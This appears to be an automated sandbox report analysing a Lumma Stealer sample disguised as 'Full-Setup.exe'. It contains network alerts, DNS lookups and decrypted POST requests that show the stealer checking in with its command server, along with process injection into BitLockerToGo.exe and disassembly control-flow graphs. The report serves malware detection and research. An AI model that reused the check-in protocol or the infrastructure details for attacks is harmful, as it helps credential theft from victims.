                                                                              2024-09-29T00:49:20.843513+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649716104.21.4.136443TCP
                                                                              2024-09-29T00:49:20.843513+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649716104.21.4.136443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Sep 29, 2024 00:49:19.101253033 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.101289988 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.101361990 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.105370045 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.105386972 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.574814081 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.574913979 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.577107906 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.577116013 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.577362061 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.627166033 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.629627943 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.629627943 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.629751921 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.735135078 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.735162020 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.735188961 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.735196114 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.735222101 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.735239029 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.735266924 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.735268116 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.735407114 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.741184950 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.741184950 CEST49715443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.741198063 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.741205931 CEST44349715104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.900655985 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.900686979 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:19.900772095 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.901303053 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:19.901314020 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.390269995 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.390732050 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:20.391925097 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:20.391949892 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.392200947 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.393471956 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:20.393471956 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:20.393562078 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.843524933 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.843619108 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.843679905 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:20.843884945 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:20.843907118 CEST44349716104.21.4.136192.168.2.6
                                                                              Sep 29, 2024 00:49:20.843924046 CEST49716443192.168.2.6104.21.4.136
                                                                              Sep 29, 2024 00:49:20.843930960 CEST44349716104.21.4.136192.168.2.6
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Sep 29, 2024 00:49:18.990662098 CEST5932453192.168.2.61.1.1.1
                                                                              Sep 29, 2024 00:49:19.073124886 CEST53593241.1.1.1192.168.2.6
                                                                              Sep 29, 2024 00:49:19.077754021 CEST6003353192.168.2.61.1.1.1
                                                                              Sep 29, 2024 00:49:19.091968060 CEST53600331.1.1.1192.168.2.6
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Sep 29, 2024 00:49:18.990662098 CEST192.168.2.61.1.1.10x885Standard query (0)trustterwowqm.shopA (IP address)IN (0x0001)false
                                                                              Sep 29, 2024 00:49:19.077754021 CEST192.168.2.61.1.1.10xaf41Standard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Sep 29, 2024 00:49:19.073124886 CEST1.1.1.1192.168.2.60x885Name error (3)trustterwowqm.shopnonenoneA (IP address)IN (0x0001)false
                                                                              Sep 29, 2024 00:49:19.091968060 CEST1.1.1.1192.168.2.60xaf41No error (0)gutterydhowi.shop104.21.4.136A (IP address)IN (0x0001)false
                                                                              Sep 29, 2024 00:49:19.091968060 CEST1.1.1.1192.168.2.60xaf41No error (0)gutterydhowi.shop172.67.132.32A (IP address)IN (0x0001)false
                                                                              • gutterydhowi.shop
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.649715104.21.4.1364433152C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-09-28 22:49:19 UTC264OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: gutterydhowi.shop
                                                                              2024-09-28 22:49:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-09-28 22:49:19 UTC551INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Sep 2024 22:49:19 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NysoiYarc6if6azgSM10Krjar0ekL8rrg5OAl8iTzaPZzibQRYJZMbLuygyL3xPw0T1NvJbiu5Q5C2e3OahjUSLDFmP%2BCPGzxXkvuz%2F9nm7Ixn179FUwWPJVSvvcAaBsoQVedA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ca7493a0eaf0f36-EWR
                                                                              2024-09-28 22:49:19 UTC818INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                              Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                              2024-09-28 22:49:19 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                                                                              Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                                                                              2024-09-28 22:49:19 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 30 33 58 4b 43 6a 6d 62 44 43 79 68 48 6f 35 42 6b 74 52 78 6f 78 6f 79 6f 33 4e 5a 71 4d 76 61 46 4e 61 44 4f 6c 32 67 63 4b 30 2d 31 37 32 37 35 36 33 37 35 39 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74
                                                                              Data Ascii: <input type="hidden" name="atok" value="03XKCjmbDCyhHo5BktRxoxoyo3NZqMvaFNaDOl2gcK0-1727563759-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
                                                                              2024-09-28 22:49:19 UTC849INData Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61
                                                                              Data Ascii: m:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
                                                                              2024-09-28 22:49:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.649716104.21.4.1364433152C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-09-28 22:49:20 UTC354OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cookie: __cf_mw_byp=03XKCjmbDCyhHo5BktRxoxoyo3NZqMvaFNaDOl2gcK0-1727563759-0.0.1.1-/api
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 77
                                                                              Host: gutterydhowi.shop
                                                                              2024-09-28 22:49:20 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 31 31 31 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--111&j=5c9b8674a630d9101b46733aa37f15ec
                                                                              2024-09-28 22:49:20 UTC780INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Sep 2024 22:49:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=kjsqfhbij1tcqon5lg039uu597; expires=Wed, 22 Jan 2025 16:35:59 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAU%2FNm1Qi8Gimd41MBsdH29g5wywXYj2HH0P0%2BA%2Fkt%2Bh21enEkKIdgjNuPyL6jB3cx8ZLPeh0LmqeyfmR2YTSIGSK2T94CvOUhg8Y%2BjGaTrZ6yjY3n7IZJWKEsQHnIJJZWj%2F7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ca7493edacc3300-EWR
                                                                              2024-09-28 22:49:20 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                              Data Ascii: aerror #D12
                                                                              2024-09-28 22:49:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:18:49:01
                                                                              Start date:28/09/2024
                                                                              Path:C:\Users\user\Desktop\Full-Setup.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Full-Setup.exe"
                                                                              Imagebase:0x7b0000
                                                                              File size:16'855'552 bytes
                                                                              MD5 hash:88A1C446D3D26BFDD2DDE2029DE24BEB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:18:49:11
                                                                              Start date:28/09/2024
                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                              Imagebase:0xba0000
                                                                              File size:231'736 bytes
                                                                              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:1.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:45.9%
                                                                                Total number of Nodes:61
                                                                                Total number of Limit Nodes:9
                                                                                execution_graph 19717 40d3a0 19718 40d3a9 19717->19718 19719 40d3b1 GetInputState 19718->19719 19720 40d57e ExitProcess 19718->19720 19721 40d3be 19719->19721 19722 40d3c6 GetCurrentThreadId GetCurrentProcessId 19721->19722 19723 40d579 19721->19723 19725 40d3fd 19722->19725 19730 446450 19723->19730 19725->19723 19729 4125e0 CoInitialize 19725->19729 19733 4479d0 19730->19733 19732 446455 FreeLibrary 19732->19720 19734 4479d9 19733->19734 19734->19732 19741 446c94 19742 446b15 19741->19742 19742->19741 19743 446e12 19742->19743 19744 446a50 LdrInitializeThunk 19742->19744 19744->19742 19745 445f16 19746 445f86 LoadLibraryExW 19745->19746 19747 445f5b 19745->19747 19748 445fa1 19746->19748 19747->19746 19735 449f80 19737 449fa0 19735->19737 19736 44a0ce 19737->19736 19739 446a50 LdrInitializeThunk 19737->19739 19739->19736 19749 443a10 19750 443a66 RtlAllocateHeap 19749->19750 19751 443a3b 19749->19751 19751->19750 19752 443a92 19753 443aa0 19752->19753 19754 443b5b RtlFreeHeap 19752->19754 19754->19753 19740 4138c8 CoInitializeSecurity CoInitializeSecurity 19755 446bbd 19756 446c5e 19755->19756 19757 446bd1 19755->19757 19757->19756 19759 446a50 LdrInitializeThunk 19757->19759 19759->19756 19760 4126db 19765 43f920 19760->19765 19762 4126e5 19763 412b0a GetSystemDirectoryW 19762->19763 19764 412b3e 19763->19764 19766 43f984 19765->19766 19767 43f9fc CoCreateInstance 19766->19767 19769 43fa63 19766->19769 19767->19769 19768 43faeb SysAllocString 19770 43fb1f 19768->19770 19769->19768 19771 43fb2b CoSetProxyBlanket 19770->19771 19772 43fe6d SysFreeString 19770->19772 19773 43fe47 SysFreeString SysFreeString 19771->19773 19777 43fb52 19771->19777 19778 43fc94 19771->19778 19772->19778 19773->19778 19774 43fbab SysAllocString 19775 43fc36 19774->19775 19776 43fc6b SysAllocString 19774->19776 19775->19776 19776->19778 19777->19774 19778->19772 19778->19773 19779 43fe92 VariantInit 19778->19779 19780 43fd9f 19778->19780 19781 43fdfe VariantClear 19778->19781 19782 43ff5d SysStringLen 19778->19782 19783 43fded VariantClear 19778->19783 19785 4400df 19778->19785 19779->19778 19780->19762 19781->19778 19782->19778 19783->19781 19784 440112 GetVolumeInformationW 19785->19784

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 51 43f920-43f982 52 43f984 51->52 53 43f9ca-43f9ea 51->53 54 43f990-43f9c8 call 443690 52->54 58 43fa63 53->58 59 43f9f1 53->59 60 43fa71-43fab5 53->60 61 43f9fc-43fa5c CoCreateInstance 53->61 54->53 58->60 59->61 62 43fab7 60->62 63 43faeb-43fb24 SysAllocString 60->63 61->58 61->60 64 43fac0-43fae9 call 443710 62->64 68 43fb2b-43fb4b CoSetProxyBlanket 63->68 69 43fe6d-43fe8c SysFreeString 63->69 64->63 70 43fe63-43fe69 68->70 71 43fb52-43fb76 68->71 72 43fca0-43fcb1 68->72 73 43fe47-43fe5c SysFreeString * 2 68->73 87 43fe92-43fef3 VariantInit 69->87 70->69 74 43fbab-43fc34 SysAllocString 71->74 75 43fb78 71->75 72->73 73->70 78 43fc36 74->78 79 43fc6b-43fc90 SysAllocString 74->79 77 43fb80-43fba9 call 443790 75->77 77->74 82 43fc40-43fc69 call 443810 78->82 83 43fc94-43fc99 79->83 82->79 83->72 83->73 88 43fef5 87->88 89 43ff2b-43ff50 87->89 90 43ff00-43ff29 call 443890 88->90 93 43fdc0-43fdd6 89->93 94 43ff57 89->94 95 43fda5-43fdb1 call 40cb10 89->95 96 440102-440123 call 4495a0 GetVolumeInformationW 89->96 97 43fe3a-43fe43 89->97 98 4400df-4400ff call 4495a0 89->98 99 43fd9f 89->99 100 43fdfe-43fe33 VariantClear 89->100 101 43ff5d-43ff82 SysStringLen 89->101 102 43fddd-43fde6 89->102 103 43fded-43fdfa VariantClear 89->103 90->89 93->94 93->95 93->96 93->97 93->98 93->99 93->100 93->102 93->103 95->93 97->73 98->96 100->87 100->93 100->94 100->95 100->96 100->97 100->98 100->99 100->101 100->102 100->103 105 43ff84-43ff86 101->105 106 43ffcc 101->106 102->93 102->94 102->95 102->96 102->97 102->98 102->99 102->100 102->102 102->103 103->100 112 43ffa0-43ffa4 105->112 113 43ffce-43fff0 call 40cb00 106->113 112->113 117 43ffa6-43ffc6 112->117 124 4400c4-4400d8 113->124 125 43fff6-43ffff 113->125 119 43ff88-43ff9e 117->119 120 43ffc8-43ffca 117->120 119->112 119->113 120->119 124->93 124->94 124->95 124->96 124->97 124->98 124->99 124->100 124->102 124->103 125->124 126 440005-44001a 125->126 127 44001c-440027 126->127 127->124 128 44002d-440031 127->128 129 440033-44003a 128->129 130 44003c-44004a 128->130 131 440099-44009f 129->131 132 44004c-440052 130->132 133 44006e-440073 130->133 136 4400a1-4400b4 131->136 137 4400bc-4400c0 131->137 132->133 134 440054-44006c 132->134 133->131 135 440075-440094 133->135 134->131 135->131 136->127 138 4400ba 136->138 137->124 138->124
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(0044DCE0,00000000,00000001,0044DCD0,00000000), ref: 0043FA51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID: ,-$D%D+$H)d/$\$p=g#
                                                                                • API String ID: 542301482-4230606281
                                                                                • Opcode ID: d7634da46563571d4bbcd264eead9b2926ecae5b96e897c6701ccd679e32ffad
                                                                                • Instruction ID: ddfdf1add1cb45c2628aa24072ec68c6d9e8a1f6b0661e62aa16555396fb0693
                                                                                • Opcode Fuzzy Hash: d7634da46563571d4bbcd264eead9b2926ecae5b96e897c6701ccd679e32ffad
                                                                                • Instruction Fuzzy Hash: 76A121B4508380AFE3209F15D898B4FBBF4FB8A356F50981DF6C98A2A1C7759844CF56

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 340 446c94-446cc5 341 446cf6-446d02 340->341 342 446cc7 340->342 344 446d04-446d0f 341->344 345 446d52-446d57 341->345 343 446cd0-446cf4 call 447da0 342->343 343->341 361 446d10-446d17 344->361 346 446d64-446d7a call 447390 345->346 347 446ec4-446ecd 345->347 348 446d80-446d93 call 447390 345->348 349 446e40-446e63 345->349 350 446ec0 345->350 351 446ec2 345->351 352 446e6e-446e7b 345->352 353 446b15 345->353 354 446db1-446dc7 345->354 355 446ed2-446ef3 345->355 356 446e12 345->356 357 446d9c-446daa 345->357 358 446d5e 345->358 359 446e18-446e27 345->359 346->348 347->355 348->357 349->352 351->347 368 446ea6-446eb5 352->368 369 446e7d-446e7f 352->369 363 446b17-446b38 353->363 365 446df9-446e0b 354->365 366 446dc9 354->366 372 446ef5 355->372 373 446f26-446f2d 355->373 357->347 357->349 357->350 357->351 357->352 357->354 357->355 357->356 357->359 358->346 359->349 370 446d20-446d26 361->370 371 446d19-446d1c 361->371 377 446b66-446b70 363->377 378 446b3a 363->378 365->349 365->350 365->351 365->352 365->355 365->356 365->359 380 446dd0-446df7 call 447e30 366->380 368->350 381 446e80-446ea4 call 447eb0 369->381 370->345 383 446d28-446d4a call 446a50 370->383 371->361 382 446d1e 371->382 374 446f00-446f24 call 447da0 372->374 373->363 376 446f33-446f3f 373->376 374->373 385 446f40-446f48 376->385 387 446b72-446b7f 377->387 388 446b99 377->388 386 446b40-446b64 call 447da0 378->386 380->365 381->368 382->345 399 446d4f 383->399 393 446f54-446f5a 385->393 394 446f4a-446f4d 385->394 386->377 396 446b80-446b8d 387->396 388->340 393->363 401 446f60-446f6c call 446a50 393->401 394->385 400 446f4f 394->400 405 446b8f 396->405 399->345 400->363 406 446f71-446f74 401->406 405->388 406->363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %sgh$4`[b$BABC
                                                                                • API String ID: 0-4050636601
                                                                                • Opcode ID: 07915ea8e0860ac93debe0bfe2d696e4b95b8868cfb2f195cab889d9f85329ed
                                                                                • Instruction ID: 2af8d7e1ac9ddaf7c1d21e945e6a3da7c4421d9f317dddeedc9e7344ed05c86f
                                                                                • Opcode Fuzzy Hash: 07915ea8e0860ac93debe0bfe2d696e4b95b8868cfb2f195cab889d9f85329ed
                                                                                • Instruction Fuzzy Hash: 57916CB460C3419BE300EF15E891B2EBBF1EB96345F24882DE4C5872A2D339D855CB1B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 432 449f80-449f94 433 449fa0-449fa9 432->433 433->433 434 449fab-449fb2 433->434 435 449fb4-449fb9 434->435 436 449fbb 434->436 437 449fbe-449fea call 40cb00 435->437 436->437 440 44a001-44a07a 437->440 441 449fec-449fef 437->441 443 44a0a6-44a0b1 440->443 444 44a07c-44a07f 440->444 442 449ff0-449fff 441->442 442->440 442->442 446 44a100-44a112 call 40cb10 443->446 447 44a0b3-44a0bb 443->447 445 44a080-44a0a4 call 44b8f0 444->445 445->443 448 44a0c0-44a0c7 447->448 451 44a0d0-44a0d6 448->451 452 44a0c9-44a0cc 448->452 451->446 456 44a0d8-44a0f6 call 446a50 451->456 452->448 455 44a0ce 452->455 455->446 458 44a0fb-44a0fe 456->458 458->446
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: @
                                                                                • API String ID: 2994545307-2766056989
                                                                                • Opcode ID: bab76df2439f2c0ad88a3ffd6047dd1be00b22571e0663e666dcf5f8c562557d
                                                                                • Instruction ID: 834f68c21dc40eb92eb561472ae9366ad0f7292fd5d51a72215fd1b469951c33
                                                                                • Opcode Fuzzy Hash: bab76df2439f2c0ad88a3ffd6047dd1be00b22571e0663e666dcf5f8c562557d
                                                                                • Instruction Fuzzy Hash: 2241D0B15083008BE710DF28D881A2BB7E5EF95358F19892EE5858B3A1D339D954CB9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 66592b145cfd978462b2adeebbde31516c9a1d80fa7114da71b6cc55fb64d651
                                                                                • Instruction ID: 3eb4b54a6ec7a7504fc8197a163cdc8539cd14c2b64a604bba0d4341ef6cdd44
                                                                                • Opcode Fuzzy Hash: 66592b145cfd978462b2adeebbde31516c9a1d80fa7114da71b6cc55fb64d651
                                                                                • Instruction Fuzzy Hash: CBA1C3B590021ADFDB008FA5DC80BAFBB75FF4A305F050429E811EB691D774E890CBA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
